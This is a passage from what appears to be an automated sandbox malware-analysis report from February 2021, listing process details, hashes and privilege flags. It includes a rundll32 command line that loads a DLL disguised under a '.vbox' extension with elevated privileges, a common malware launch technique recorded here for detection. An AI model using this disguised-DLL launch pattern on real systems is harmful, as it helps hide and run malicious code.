                  Imagebase:0x13f020000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:15:48:45
                  Start date:15/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\kdfe.vbox,DllRegisterServer
                  Imagebase:0xff5b0000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Disassembly

                  Code Analysis

                  Reset < >